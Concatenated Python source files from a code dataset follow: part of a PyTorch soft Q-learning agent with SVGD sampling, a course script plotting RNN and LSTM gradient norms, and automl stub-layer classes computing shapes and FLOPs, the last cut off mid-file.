self.q_optimizer.zero_grad()\n loss_q, loss_info = self.compute_loss_q(data)\n loss_q.backward()\n self.q_optimizer.step()\n \n # update stein sampler \n self.update_svgd_ss(data)\n #This PLACE\n \n \n \n def get_sample(self, o,n_sample=1):\n a = self.SVGD_Network.act(T.as_tensor(o, dtype=T.float32),n_particles=n_sample)\n # a += act_noise * np.random.randn(act_dim)\n return np.clip(a, -self.action_bound, self.action_bound) \n \n \n def plot_paths(self, epoch):\n paths = []\n actions_plot=[]\n env = MultiGoalEnv()\n \n for episode in range(30):\n observation = env.reset()\n done = False\n step = 0\n path = {'infos':{'pos':[]}}\n particles = None\n while not done and step < 30 :\n \n actions = self.get_sample(observation,1)\n \n observation, reward, done, _ = env.step(actions)\n path['infos']['pos'].append(observation)\n step +=1\n paths.append(path)\n print(\"saving figure..., epoch=\",epoch)\n # with open('./actions_'+str(epoch)+'.txt', 'w') as filehandle:\n # for listitem in actions_plot:\n # filehandle.write('%s\\n' % listitem) \n env.render_rollouts(paths,fout=\"test_%d.png\" % epoch)\n \n \n\n\n# class Agent():\n# def __init__(self, beta=0.0003, state_dim=[8], action_dim=2, n_particles=16,\n# env=None, gamma=0.99, max_size=int(1e6), tau=0.005, max_action=1000,\n# batch_size=100, reward_scale=1):\n \n# self.gamma = gamma\n# self.tau = tau\n# self.memory = ReplayBuffer(max_size, state_dim, action_dim)\n# self.batch_size = batch_size\n# self.action_dim = action_dim\n# self.n_particles = n_particles\n \n# self.update_ratio = 0.5\n\n\n# # Q Network\n# self.Q_Network = ActionValueNetwork(lr=1e-3, state_dim=state_dim, action_dim=action_dim,\n# n_particles=n_particles, name='ActionValueNetwork')\n# self.Q_Network.double()\n# # q Arbitrary Network\n# self.SVGD_Network = SamplerNetwork(lr=1e-3, state_dim=state_dim, action_dim=action_dim,\n# n_particles=n_particles, max_action=max_action)\n# self.SVGD_Network.double()\n# self.reward_scale = reward_scale\n\n# def remember(self, state, action, reward, new_state, done):\n# self.memory.store_transition(state, action, reward, new_state, done)\n\n# def save_models(self):\n# print('.... saving models ....')\n# self.Q_Network.save_checkpoint()\n# self.SVGD_Network.save_checkpoint()\n \n\n# def load_models(self):\n# print('.... 
loading models ....')\n# self.Q_Network.save_checkpoint()\n# self.SVGD_Network.save_checkpoint()\n \n \n \n# def rbf_kernel(self, input_1, input_2, h_min=1e-3):\n \n# k_fix, out_dim1 = input_1.size()[-2:]\n# k_upd, out_dim2 = input_2.size()[-2:]\n# assert out_dim1 == out_dim2\n \n# leading_shape = input_1.size()[:-2]\n# # Compute the pairwise distances of left and right particles.\n# diff = input_1.unsqueeze(-2) - input_2.unsqueeze(-3)\n# # N * k_fix * 1 * out_dim / N * 1 * k_upd * out_dim/ N * k_fix * k_upd * out_dim\n# dist_sq = diff.pow(2).sum(-1)\n# # N * k_fix * k_upd\n# dist_sq = dist_sq.unsqueeze(-1)\n# # N * k_fix * k_upd * 1\n \n# # Get median.\n# median_sq = T.median(dist_sq, dim=1)[0]\n# median_sq = median_sq.unsqueeze(1)\n# # N * 1 * k_upd * 1\n \n# h = median_sq / np.log(k_fix + 1.) + .001\n# # N * 1 * k_upd * 1\n \n# kappa = T.exp(-dist_sq / h)\n# # N * k_fix * k_upd * 1\n \n# # Construct the gradient\n# kappa_grad = -2. * diff / h * kappa\n# return kappa, kappa_grad\n \n \n \n# def get_Q_value(self, state, action, particles=False, training=False): \n# # (bs, sd), (bs, np, ad)\n \n \n# if training and particles:\n# # Training with particles\n# Q_soft = self.Q_Network.forward(state.unsqueeze(1).double(), action.double())\n \n \n# elif training and not particles:\n# # Training without particles\n# Q_soft = self.Q_Network.forward(state.double(), action.double())\n \n# elif not training and particles:\n# # Evaluating with particles\n# Q_soft = self.Q_Network.forward(state.double(), action.double())\n \n# return Q_soft\n \n \n \n \n# def choose_action_uniform(self, particles=False, reparameterize=True):\n# if particles:\n# low = T.full((self.batch_size, self.n_particles, self.action_dim), -1.)\n# high = T.full((self.batch_size, self.n_particles, self.action_dim), 1.)\n# else:\n# low = T.full((self.batch_size, self.action_dim), -1.)\n# high = T.full((self.batch_size, self.action_dim), 1.)\n# dist = Uniform(low, high)\n# noise = dist.sample()\n# return noise, dist\n \n \n# def get_action_svgd(self, state, training=False, particles=False):\n# # Sample noise from normal distribution\n \n# if training and particles:\n# low = T.full((self.batch_size, self.n_particles, self.action_dim), -1.)\n# high = T.full((self.batch_size, self.n_particles, self.action_dim), 1.)\n# dist = Uniform(low, high)\n# noise = dist.sample()\n# actions = self.SVGD_Network.forward(state.double().unsqueeze(1), noise.double())\n# elif training and not particles:\n# low = T.full((self.batch_size, self.action_dim), -1.)\n# high = T.full((self.batch_size, self.action_dim), 1.)\n# dist = Uniform(low, high)\n# noise = dist.sample()\n# #print(noise)\n# actions = self.SVGD_Network.forward(state.double(), noise.double())\n# elif not training and not particles:\n# low = T.full((1, 1, self.action_dim), -1.)\n# high = T.full((1, 1, self.action_dim), 1.)\n# dist = Uniform(low, high)\n# noise = dist.sample()\n# self.SVGD_Network.eval()\n# actions = self.SVGD_Network.forward(state.double().unsqueeze(0), noise.double())\n# elif not training and particles:\n# low = T.full((1, self.n_particles, self.action_dim), -1.)\n# high = T.full((1, self.n_particles, self.action_dim), 1.)\n# dist = Uniform(low, high)\n# noise = dist.sample()\n# self.SVGD_Network.eval()\n# actions = self.SVGD_Network.forward(state.double().unsqueeze(0), noise.double())\n# return actions\n\n \n \n \n \n# ############################ LEARN ############################### \n# def learn(self, steps):\n# if self.memory.mem_cntr < self.batch_size:\n# return\n \n# # 
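# --- Hedged aside: the commented-out rbf_kernel above picks its bandwidth
# with the common "median heuristic". That choice in isolation (assumed
# input: a flattened tensor of pairwise squared distances):
import numpy as np
import torch as T

def median_bandwidth(dist_sq, n_particles, eps=1e-3):
    # Median pairwise squared distance, scaled by log(n + 1) so the kernel
    # neither collapses nor flattens out as the particle count grows.
    median_sq = T.median(dist_sq.reshape(-1))
    return median_sq / np.log(n_particles + 1.0) + eps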
Sample a minibatch from the replay memory\n# state, action, reward, new_state, done = \\\n# self.memory.sample_buffer(self.batch_size)\n \n# # -------- Update the soft Q-function Parameters -------- #\n \n# # Converting the sampled experience to Tensors\n# state = T.tensor(state, dtype=T.float).to(self.SVGD_Network.device)\n# action = T.tensor(action, dtype=T.float).to(self.SVGD_Network.device)\n# reward = T.tensor(reward, dtype=T.float).to(self.SVGD_Network.device)\n# state_ = T.tensor(new_state, dtype=T.float).to(self.SVGD_Network.device)\n# done = T.tensor(done.astype(float)).to(self.SVGD_Network.device)\n \n# # for i in range(10):\n# # print('state : ', state[i].numpy().squeeze(), ' action : ', action[i].numpy().squeeze(), ' reward : ', reward[i].numpy().squeeze(), ' state_ : ', state_[i].numpy().squeeze())\n \n# # Sample actions for next states (state_) (bs, np, ad)\n# #action_, dist = self.choose_action_uniform(state_)\n# action_ = self.get_action_svgd(state, training=True, particles=True)\n \n# # Calculate the Q-value using the Q-network for next states (state_) (bs, np, 1)\n# Q_soft_ = self.get_Q_value(state_, action_, training=True, particles=True)\n# print(Q_soft_)\n \n \n# # Equation 10 \n# V_soft_ = T.logsumexp(Q_soft_, dim=1)\n# V_soft_ += self.action_dim * T.log(T.tensor([2.]))\n \n \n# # Evaluate Q hat in Equation 11\n# with T.no_grad():\n# Q_soft_hat = self.reward_scale * reward.unsqueeze(-1) + self.gamma * (1 - done.unsqueeze(-1)) * V_soft_ # (bs, 1)\n \n# # Calculate the Q-value using the Q-network for current states (state) \n# Q_soft = self.get_Q_value(state, action, training=True, particles=False) # (bs, np)\n\n\n# # Equation 11 \n# l2 = 0.0\n# for p in self.Q_Network.parameters():\n# l2 = l2 + p.norm(2)\n# J_Q = 0.5 * T.mean((Q_soft_hat - Q_soft) ** 2, dim=0) + l2\n \n# print(J_Q)\n \n# # Update Q Network \n# Q_network_loss = J_Q\n# self.Q_Network.optimizer.zero_grad()\n# Q_network_loss.backward()\n# self.Q_Network.optimizer.step()\n \n# # -------- Update The Policy -------- #\n \n# if steps%30 == 0:\n# # Compute aciton \n# action_svgd = self.get_action_svgd(state, training=True, particles=True) # (bs, np, ad)\n# #print('action_svgd', action_svgd)\n# #print(state)\n# svgd_Q_soft = self.get_Q_value(state, action_svgd, training=True, particles=True) # (bs, np, 1)\n# # print('action_svgd : ', action_svgd.squeeze(-1))\n# # print('svgd_Q_soft : ', svgd_Q_soft)\n \n# squash_correction = T.sum(T.log(1 - action_svgd**2 + 1e-6), dim=-1)\n# svgd_Q_soft = T.add(svgd_Q_soft, squash_correction.unsqueeze(-1))\n \n \n# # Get the Gradients of the energy with respect to x and y\n# grad_score = T.autograd.grad(svgd_Q_soft.sum(), action_svgd)[0].squeeze(-1)\n \n# # Compute the similarity using the RBF kernel \n# # kappa grad_kappa= T.empty(1)\n# # for i in range(self.batch_size): \n# kappa, grad_kappa = self.rbf_kernel(input_1=action_svgd, input_2=action_svgd) # (bs, np, ad)\n \n \n \n# l2 = 0.0\n# for p in self.SVGD_Network.parameters():\n# l2 = l2 + p.norm(2)\n# svgd = T.sum(kappa * grad_score.unsqueeze(2) + grad_kappa, dim=1) / self.n_particles - l2 # (bs, np * ad)\n# #print('svgd : ' ,svgd)\n# self.SVGD_Network.optimizer.zero_grad()\n# T.autograd.backward(-action_svgd, grad_tensors=svgd)\n# self.SVGD_Network.optimizer.step() \n \n \n \n \n \n \n \n \n ","sub_path":"archive/varsion 3_/SQL_torch.py","file_name":"SQL_torch.py","file_ext":"py","file_size_in_byte":18157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 
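# --- Hedged recap of the file that just ended (SQL_torch.py), not code from
# it: the Q-update there is an ordinary MSE regression onto a soft Bellman
# target. Stripped to its core, with the soft value already computed per
# next-state:
import torch as T

def soft_bellman_target(r, done, v_soft_next, gamma=0.99):
    # No gradient flows through the target; (1 - done) zeroes the bootstrap
    # term on terminal transitions.
    with T.no_grad():
        return r + gamma * (1.0 - done) * v_soft_next

# loss_q = ((q - soft_bellman_target(r, d, v_next)) ** 2).mean()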
+{"seq_id":"210109502","text":"################################################################################\n# MIT License\n#\n# Copyright (c) 2019\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to conditions.\n#\n# Author: Deep Learning Course | Fall 2019\n# Date Created: 2019-09-06\n################################################################################\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport sys\n\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n\nsys.path.append(\"..\")\n\nfrom part1.dataset import PalindromeDataset\nfrom part1.vanilla_rnn import VanillaRNN\nfrom part1.lstm import LSTM\n\n\n# You may want to look into tensorboard for logging\n# from torch.utils.tensorboard import SummaryWriter\n\n################################################################################\n\ndef train(config):\n # Initialize the device which to run the model on\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n config.input_length = 10\n\n # Initialize the model that we are going to use\n model_rnn = VanillaRNN(seq_length=config.input_length,\n input_dim=config.input_dim,\n num_hidden=config.num_hidden,\n num_classes=config.num_classes,\n device=device)\n\n model_lstm = LSTM(seq_length=config.input_length,\n input_dim=config.input_dim,\n num_hidden=config.num_hidden,\n num_classes=config.num_classes,\n device=device)\n\n # Initialize the dataset and data loader (note the +1)\n dataset = PalindromeDataset(config.input_length + 1)\n data_loader = DataLoader(dataset, 1, num_workers=1)\n\n # Setup the loss and optimizer\n criterion = nn.CrossEntropyLoss()\n input, targets = next(iter(data_loader))\n\n for model in [model_rnn, model_lstm]:\n preds = model(input)\n criterion(preds, targets).backward()\n\n norms = [h.grad.norm() for h in model.hs]\n plt.plot(norms, label=f\"{str(model)[:-2]}\")\n\n plt.legend()\n plt.savefig(\"gradients.png\")\n plt.show()\n\n\n################################################################################\n################################################################################\n\nif __name__ == \"__main__\":\n torch.manual_seed(43)\n # Parse training configuration\n parser = argparse.ArgumentParser()\n\n # Model params\n parser.add_argument('--model_type', type=str, default=\"RNN\", help=\"Model type, should be 'RNN' or 'LSTM'\")\n parser.add_argument('--input_length', type=int, default=10, help='Length of an input sequence')\n parser.add_argument('--input_dim', type=int, default=1, help='Dimensionality of input sequence')\n parser.add_argument('--num_classes', type=int, default=10, help='Dimensionality of output sequence')\n parser.add_argument('--num_hidden', type=int, default=128, help='Number of hidden units in the model')\n parser.add_argument('--batch_size', type=int, default=128, help='Number of examples to process in a batch')\n parser.add_argument('--learning_rate', type=float, default=0.001, help='Learning rate')\n parser.add_argument('--train_steps', type=int, default=10000, 
help='Number of training steps')\n parser.add_argument('--max_norm', type=float, default=10.0)\n parser.add_argument('--device', type=str, default=\"cuda:0\", help=\"Training device 'cpu' or 'cuda:0'\")\n\n config = parser.parse_args()\n\n # Train the model\n train(config)\n","sub_path":"assignment2/part1/grads_over_time.py","file_name":"grads_over_time.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"424336618","text":"# -*- coding: UTF-8 -*-\n# @Time : 2018/12/18 12:14 PM\n# @File : basestublayers.py\n# @Author : jian\nfrom __future__ import division\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nfrom antgo.automl.stublayer import *\nimport numpy as np\n\n\nclass BaseStubWeightBiasLayer(StubLayer):\n def import_weights(self, layer):\n pass\n\n def export_weights(self, layer):\n pass\n\n\nclass BaseStubDense(BaseStubWeightBiasLayer):\n def __init__(self, input_units, units, input=None, output=None, **kwargs):\n super(BaseStubDense, self).__init__(input, output, **kwargs)\n self.input_units = input_units\n self.units = units\n self.layer_type = 'dense'\n self.layer_name = 'dense'\n self.layer_width = units\n\n @property\n def output_shape(self):\n return self.units,\n\n def size(self):\n return self.input_units * self.units + self.units\n\n def flops(self):\n return self.input.shape[-1] * self.units + (self.input.shape[-1] - 1) + self.units\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.dense(self.input_units, self.units, block_name=self.block_name, cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubConv2d(BaseStubWeightBiasLayer):\n def __init__(self, input_channel, filters, kernel_size_h, kernel_size_w, rate_h=1, rate_w=1, stride=1, input=None, output=None, **kwargs):\n super(BaseStubConv2d, self).__init__(input, output, **kwargs)\n self.input_channel = input_channel\n self.filters = filters\n self.kernel_size_h = kernel_size_h\n self.kernel_size_w = kernel_size_w\n self.rate_h = rate_h\n self.rate_w = rate_w\n self.stride = stride\n self.layer_type = 'conv2d'\n self.layer_name = 'conv2d'\n self.layer_width = filters\n self.n_dim = 2\n assert(stride == 1)\n\n @property\n def output_shape(self):\n ret = (self.input.shape[0],)\n for dim in self.input.shape[1:-1]:\n ret = ret + (max(int(dim / self.stride), 1),)\n\n ret = ret + (self.filters,)\n return ret\n\n def size(self):\n return self.filters * self.kernel_size_h * self.kernel_size_w * self.input_channel + self.filters\n\n def flops(self):\n n = self.input.shape[-1] * self.kernel_size_h * self.kernel_size_w # vector_length\n flops_per_instance = n + (n - 1) # general defination for number of flops (n: multiplications and n-1: additions)\n num_instances_per_filter = ((self.input.shape[1] - self.kernel_size_h + self.kernel_size_h / 2) / self.stride) + 1 # for rows\n num_instances_per_filter *= ((self.input.shape[2] - self.kernel_size_w + self.kernel_size_w / 2) / self.stride) + 1 # multiplying with cols\n\n flops_per_filter = num_instances_per_filter * flops_per_instance\n total_flops_per_layer = flops_per_filter * self.filters # multiply with number of filters\n\n return total_flops_per_layer\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.conv2d(self.input_channel,\n self.filters,\n self.kernel_size_h,\n self.kernel_size_w,\n 
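# --- Hedged aside: every flops() method in this file follows the same
# recipe -- multiply-adds per output element times the number of output
# elements. For a plain convolution that is (stride 1; the class above also
# folds an approximate padding term into its instance count, which this
# simplified standalone version ignores):
def conv2d_flops(h, w, in_ch, out_ch, kh, kw):
    n = in_ch * kh * kw          # length of the dot product per output pixel
    per_output = n + (n - 1)     # n multiplications + (n - 1) additions
    outputs = h * w * out_ch     # one dot product per output element
    return per_output * outputs

# conv2d_flops(32, 32, 3, 16, 3, 3) -> 868352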
self.rate_h,\n self.rate_w,\n self.stride,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubSeparableConv2d(BaseStubWeightBiasLayer):\n def __init__(self, input_channel, filters, kernel_size_h, kernel_size_w, rate_h=1, rate_w=1, stride=1, input=None, output=None, **kwargs):\n super(BaseStubSeparableConv2d, self).__init__(input, output, **kwargs)\n self.input_channel = input_channel\n self.filters = filters\n self.kernel_size_h = kernel_size_h\n self.kernel_size_w = kernel_size_w\n self.rate_h = rate_h\n self.rate_w = rate_w\n self.stride = stride\n self.layer_type = 'conv2d'\n self.layer_name = 'separable_conv2d'\n self.layer_width = filters\n self.n_dim = 2\n assert(stride == 1)\n\n @property\n def output_shape(self):\n ret = (self.input.shape[0],)\n for dim in self.input.shape[1:-1]:\n ret = ret + (max(int(dim / self.stride), 1),)\n\n ret = ret + (self.filters,)\n return ret\n\n def size(self):\n return self.filters * self.kernel_size_h * self.kernel_size_w*self.input_channel + self.filters\n\n def flops(self):\n # 1.step depthwise convolution\n n = 1 * self.kernel_size_h * self.kernel_size_w # vector_length\n flops_per_instance_step_1 = n + (n - 1) # general defination for number of flops (n: multiplications and n-1: additions)\n num_instances_per_filter = ((self.input.shape[1] - self.kernel_size_h + self.kernel_size_h / 2) / self.stride) + 1 # for rows\n num_instances_per_filter *= ((self.input.shape[2] - self.kernel_size_w + self.kernel_size_w / 2) / self.stride) + 1 # multiplying with cols\n\n flops_per_filter_step_1 = num_instances_per_filter * flops_per_instance_step_1\n total_flops_per_layer_step_1 = flops_per_filter_step_1 * self.filters # multiply with number of filters\n\n # 2.step pointwise convolution\n n = self.input.shape[-1] * 1 * 1\n flops_per_instance_step_2 = n + (n - 1)\n flops_per_filter_step_2 = num_instances_per_filter * flops_per_instance_step_2\n total_flops_per_layer_step_2 = flops_per_filter_step_2 * self.filters # multiply with number of filters\n\n return total_flops_per_layer_step_1+total_flops_per_layer_step_2\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.separable_conv2d(self.input_channel,\n self.filters,\n self.kernel_size_h,\n self.kernel_size_w,\n self.rate_h,\n self.rate_w,\n self.stride,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubIdentity(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubIdentity, self).__init__(input, output,**kwargs)\n\n @property\n def output_shape(self):\n return self.input.shape\n\n def size(self):\n return 0\n\n def flops(self):\n return 0.0\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.identity(\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubSPP(BaseStubWeightBiasLayer):\n def __init__(self, grid_h, grid_w, input=None, output=None, **kwargs):\n super(BaseStubSPP, self).__init__(input, output, **kwargs)\n self.grid_h = grid_h\n self.grid_w = grid_w\n self.layer_type = 'spp'\n self.layer_name = 'spp'\n\n @property\n def output_shape(self):\n return self.input.shape\n\n def size(self):\n return 0\n\n def flops(self):\n # 1.step average pooling\n flops_per_instance_step_1 = self.grid_h*self.grid_w\n 
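# --- Hedged aside on the separable convolution defined just above: the
# depthwise + pointwise factorization is also where the parameter savings
# come from. Counting weights for both forms (biases omitted; note the
# stub's size() above appears to reuse the dense-conv count, whereas the
# factorized count would be):
def conv_params(in_ch, out_ch, kh, kw):
    return in_ch * out_ch * kh * kw

def separable_params(in_ch, out_ch, kh, kw):
    depthwise = in_ch * kh * kw        # one kh x kw filter per input channel
    pointwise = in_ch * out_ch         # 1x1 mixing across channels
    return depthwise + pointwise

# conv_params(64, 128, 3, 3) -> 73728 vs. separable_params(64, 128, 3, 3)
# -> 8768, roughly an 8.4x reduction.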
operates = ((self.input.shape[1] - self.grid_h + self.grid_h / 2) / self.grid_h) + 1\n operates *= ((self.input.shape[2] - self.grid_w + self.grid_w / 2) / self.grid_w) + 1\n flops_step_1 = operates * flops_per_instance_step_1 * self.input.shape[3]\n\n # 2.step 1x1 convolution\n n = self.input.shape[3] * 1 * 1\n flops_step_2 = operates * (n + (n - 1)) * self.input.shape[3] # multiply with number of filters\n\n # 3.step bilinear resize\n flops_step_3 = self.input.shape[1] * self.input.shape[2] * self.input.shape[3] * 7\n\n return flops_step_1 + flops_step_2 + flops_step_3\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.spp(self.grid_h,\n self.grid_w,\n self.input,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubConcatenate(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n if input is None:\n input = []\n super(BaseStubConcatenate, self).__init__(input, output, **kwargs)\n self.layer_type = 'concat'\n self.layer_name = 'concat'\n\n @property\n def output_shape(self):\n ret = 0\n for current_input in self.input:\n ret += current_input.shape[-1]\n ret = tuple(self.input[0].shape[:-1]) + (ret,)\n return ret\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.concat(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubAdd(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubAdd, self).__init__(input, output, **kwargs)\n self.layer_type = 'add'\n self.layer_name = 'add'\n\n @property\n def output_shape(self):\n return self.input[0].shape\n\n def flops(self):\n return self.input[0].shape[1] * self.input[0].shape[2] * self.input[0].shape[3] - 1\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.add(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubDot(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubDot, self).__init__(input, output, **kwargs)\n self.layer_type = 'dot'\n self.layer_name = 'dot'\n\n @property\n def output_shape(self):\n return self.input[0].shape\n\n def flops(self):\n return self.input[0].shape[1] * self.input[0].shape[2] * self.input[0].shape[3] - 1\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.dot(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\n\nclass BaseStubFlatten(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubFlatten, self).__init__(input, output, **kwargs)\n self.layer_type = 'flatten'\n self.layer_name = 'flatten'\n\n @property\n def output_shape(self):\n ret = 1\n for dim in self.input.shape:\n ret *= dim\n return ret,\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.flatten(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubReLU(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubReLU, self).__init__(input, output, **kwargs)\n self.layer_type = 'relu'\n self.layer_name = 'relu'\n\n def flops(self):\n return 
self.input.shape[1] * self.input.shape[2] * self.input.shape[3]\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.relu(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubReLU6(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubReLU6, self).__init__(input, output, **kwargs)\n self.layer_type = 'relu6'\n self.layer_name = 'relu6'\n\n def flops(self):\n return self.input.shape[1] * self.input.shape[2] * self.input.shape[3]\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.relu6(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubSoftmax(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubSoftmax, self).__init__(input, output, **kwargs)\n self.layer_type = 'softmax'\n self.layer_name = 'softmax'\n\n def flops(self):\n return 0\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.softmax(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubSigmoid(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubSigmoid, self).__init__(input, output, **kwargs)\n self.layer_type = 'sigmoid'\n self.layer_name = 'sigmoid'\n\n def flops(self):\n return 0\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.sigmoid(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubPooling(StubLayer):\n def __init__(self, kernel_size_h=2, kernel_size_w=2, input=None, output=None, **kwargs):\n super(BaseStubPooling, self).__init__(input, output, **kwargs)\n self.kernel_size_h = kernel_size_h\n self.kernel_size_w = kernel_size_w\n self.is_spatial_change = True\n self.layer_type = 'pool2d'\n\n @property\n def output_shape(self):\n ret = (self.input.shape[0],)\n ret = ret + (max(int(self.input.shape[1] / self.kernel_size_h), 1),)\n ret = ret + (max(int(self.input.shape[2] / self.kernel_size_w), 1),)\n ret = ret + (self.input.shape[-1],)\n return ret\n\n\nclass BaseStubAvgPooling2d(BaseStubPooling):\n def __init__(self, kernel_size_h=2, kernel_size_w=2, input=None, output=None, **kwargs):\n super(BaseStubAvgPooling2d, self).__init__(kernel_size_h, kernel_size_w, input, output, **kwargs)\n self.layer_name = 'avg_pool2d'\n\n def flops(self):\n flops_per_instance_step_1 = self.kernel_size_h*self.kernel_size_w\n operates = ((self.input.shape[1] - self.kernel_size_h + self.kernel_size_h / 2) / self.kernel_size_h) + 1\n operates *= ((self.input.shape[2] - self.kernel_size_w + self.kernel_size_w / 2) / self.kernel_size_w) + 1\n total_flops = operates * flops_per_instance_step_1 * self.input.shape[3]\n\n return total_flops\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.avg_pool2d(self.kernel_size_h,\n self.kernel_size_w,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubMaxPooling2d(BaseStubPooling):\n def __init__(self, kernel_size_h=2, kernel_size_w=2, input=None, output=None, **kwargs):\n super(BaseStubMaxPooling2d, 
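# --- Hedged aside: BaseStubPooling.output_shape above is floor division by
# the kernel size, clamped to 1 so tiny inputs never collapse to a
# zero-sized dimension. The same rule as a standalone function (assumed
# NHWC shapes):
def pooled_shape(shape_nhwc, kh, kw):
    n, h, w, c = shape_nhwc
    return (n, max(h // kh, 1), max(w // kw, 1), c)

# pooled_shape((1, 7, 7, 32), 2, 2) -> (1, 3, 3, 32)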
self).__init__(kernel_size_h, kernel_size_w, input, output, **kwargs)\n self.layer_name = 'max_pool2d'\n\n def flops(self):\n flops_per_instance_step_1 = self.kernel_size_h * self.kernel_size_w\n operates = ((self.input.shape[1] - self.kernel_size_h + self.kernel_size_h / 2) / self.kernel_size_h) + 1\n operates *= ((self.input.shape[2] - self.kernel_size_w + self.kernel_size_w / 2) / self.kernel_size_w) + 1\n total_flops = operates * flops_per_instance_step_1 * self.input.shape[3]\n\n return total_flops\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.max_pool2d(self.kernel_size_h,\n self.kernel_size_w,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubGlobalPooling(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubGlobalPooling, self).__init__(input, output, **kwargs)\n self.layer_type = 'global_pool2d'\n\n @property\n def output_shape(self):\n return (self.input.shape[0], 1, 1, self.input.shape[-1])\n\n\nclass BaseStubGlobalPooling2d(BaseStubGlobalPooling):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubGlobalPooling2d, self).__init__(input, output, **kwargs)\n self.layer_name = 'global_pool2d'\n\n def flops(self):\n return self.input.shape[1] * self.input.shape[2] * self.input.shape[3]\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.global_pool2d(block_name=self.block_name, cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubDropout(StubLayer):\n def __init__(self, rate, input=None, output=None, **kwargs):\n super(BaseStubDropout, self).__init__(input, output, **kwargs)\n self.rate = rate\n self.layer_type = 'dropout'\n\n\nclass BaseStubDropout2d(BaseStubDropout):\n def __init__(self, rate, input=None, output=None, **kwargs):\n super(BaseStubDropout2d, self).__init__(rate, input, output, **kwargs)\n self.layer_name = 'dropout_2d'\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.dropout_2d(self.rate,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubInput(StubLayer):\n def __init__(self, shape, input=None, output=None, **kwargs):\n super(BaseStubInput, self).__init__(input, output, **kwargs)\n self.shape = shape\n self.layer_type = 